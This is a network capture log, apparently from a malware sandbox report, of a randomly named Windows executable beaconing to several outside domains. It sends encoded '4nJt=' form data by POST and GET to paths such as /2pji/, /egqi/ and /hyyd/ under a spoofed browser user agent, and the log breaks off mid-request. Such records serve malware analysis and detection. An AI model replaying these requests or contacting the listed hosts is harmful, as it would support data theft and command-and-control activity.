                                                                                                                      Data Ascii: 4nJt=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYkjAjUzPf+jWoVOIi/mCQUkk3fX9tvJ1+8fPuzd9rnW1x
Nov 26, 2024 11:18:24.529572964 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:24 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49966 | 194.85.61.76 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:25.834130049 CET | 645 | OUT | POST /2pji/ HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.mrpokrovskii.pro
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0E1fVlfvp1U+f3uhKxMoiQSMY4ejAYwFcHlNvAzIHCwkQ==
Nov 26, 2024 11:18:27.154783964 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:26 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49973 | 194.85.61.76 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:28.505179882 CET | 1658 | OUT | POST /2pji/ HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.mrpokrovskii.pro
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: 4nJt= [TRUNCATED]
Nov 26, 2024 11:18:29.856307983 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:29 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49982 | 194.85.61.76 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:31.211147070 CET | 365 | OUT | GET /2pji/?4nJt=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT4yZs3PgO7inQ/GZvdPSYtqhraoLnL30EVGtCNPTPRdM0+5LARJM=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:18:32.589325905 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:32 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50000 | 47.76.213.197 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:38.872106075 CET | 603 | OUT | POST /egqi/ HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ytsd88.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ytsd88.top/egqi/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeCMIswqV9hA+/sIWkdnHlXYJcwKQGmG3YsVFU/hKXZcNy
Nov 26, 2024 11:18:40.501252890 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:40 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50006 | 47.76.213.197 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:41.537240982 CET | 627 | OUT | POST /egqi/ HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ytsd88.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ytsd88.top/egqi/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFIpewII0mm3yuV9Ut2GwWooRIaxiePF3d4on+Zhxpu3AsQ==
Nov 26, 2024 11:18:43.132440090 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:42 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50008 | 47.76.213.197 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:44.192878962 CET | 1640 | OUT | POST /egqi/ HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ytsd88.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ytsd88.top/egqi/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:18:45.767977953 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:45 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50009 | 47.76.213.197 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:46.846867085 CET | 359 | OUT | GET /egqi/?4nJt=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8hsZr969MltuXdWdWoGPR3ZZyiGe82JgugZANkAzsKk95fWmtipo=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:18:48.481254101 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:48 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50010 | 208.91.197.27 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:54.893556118 CET | 633 | OUT | POST /hyyd/ HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.matteicapital.online
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.matteicapital.online/hyyd/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8mF2oX5uUV/j1DFU4r+1fWsLqw+61Ni0Q+HFe5dLRn8tn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50011 | 208.91.197.27 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:57.552764893 CET | 657 | OUT | POST /hyyd/ HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.matteicapital.online
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.matteicapital.online/hyyd/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E8row8iHNC068H9erKH2oIIEOqIT3Of3pg4Ya3PaoZFudg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50012 | 208.91.197.27 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:19:00.209126949 CET | 1670 | OUT | POST /hyyd/ HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.matteicapital.online
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.matteicapital.online/hyyd/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50013 | 208.91.197.27 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:19:02.996316910 CET | 369 | OUT | GET /hyyd/?pXIDi=30N834GpBZU0OT&4nJt=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXzRX0Cz+jRSrIUTHSjZKbFGxkH1PP6E18JoqtQ6kBAoCTLA5p2fs= HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:19:04.953087091 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:03 GMT
                                                                                                                      Server: Apache
                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                      Set-Cookie: vsid=904vr48016194401796911; expires=Sun, 25-Nov-2029 10:19:04 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Fywsigjq1lMPxNYivwI9U8n2KbS913zBgG1pWE8IPJ+SG4Zvp92neIzuRlo8hX21bQ5moyyaecf1RJdZALbE/A==
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50014 | 8.210.114.150 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:19:11.256068945 CET | 615 | OUT | POST /rsvy/ HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.llljjjiii.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:19:12.859240055 CET | 925 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:12 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=61efrsksu1jk9l2if3qjjcj616; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=61efrsksu1jk9l2if3qjjcj616; expires=Fri, 24-Nov-2034 10:19:12 GMT; Max-Age=315360000; path=/
                                                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50015 | 8.210.114.150 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:19:13.917531967 CET | 639 | OUT | POST /rsvy/ HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.llljjjiii.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:19:15.507349968 CET | 925 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:15 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=mllms815r33rr5ffkb0pshd5c1; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=mllms815r33rr5ffkb0pshd5c1; expires=Fri, 24-Nov-2034 10:19:15 GMT; Max-Age=315360000; path=/
                                                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 50016 | 8.210.114.150 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:19:16.582716942 CET | 1652 | OUT | POST /rsvy/ HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.llljjjiii.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:19:18.182651997 CET | 925 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:17 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=mid2fssla5oqia75p4dmdnq317; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=mid2fssla5oqia75p4dmdnq317; expires=Fri, 24-Nov-2034 10:19:17 GMT; Max-Age=315360000; path=/
                                                                                                                      Content-Encoding: gzip


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      28 | 192.168.2.6 | 50017 | 8.210.114.150 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 26, 2024 11:19:19.237539053 CET | 363 | OUT | GET /rsvy/?4nJt=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rUtvmrzoHlx2y6yO58LrdYrj1cF4c73Y/2t0betNNlPaD+UeVatM=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:19:20.793379068 CET | 1120 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:20 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=m0kf9igdg5v5rlgnq5e9042i52; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=m0kf9igdg5v5rlgnq5e9042i52; expires=Fri, 24-Nov-2034 10:19:20 GMT; Max-Age=315360000; path=/
                                                                                                                      Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      29 | 192.168.2.6 | 50018 | 172.67.209.48 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 26, 2024 11:19:26.303544044 CET | 621 | OUT | POST /huvt/ HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
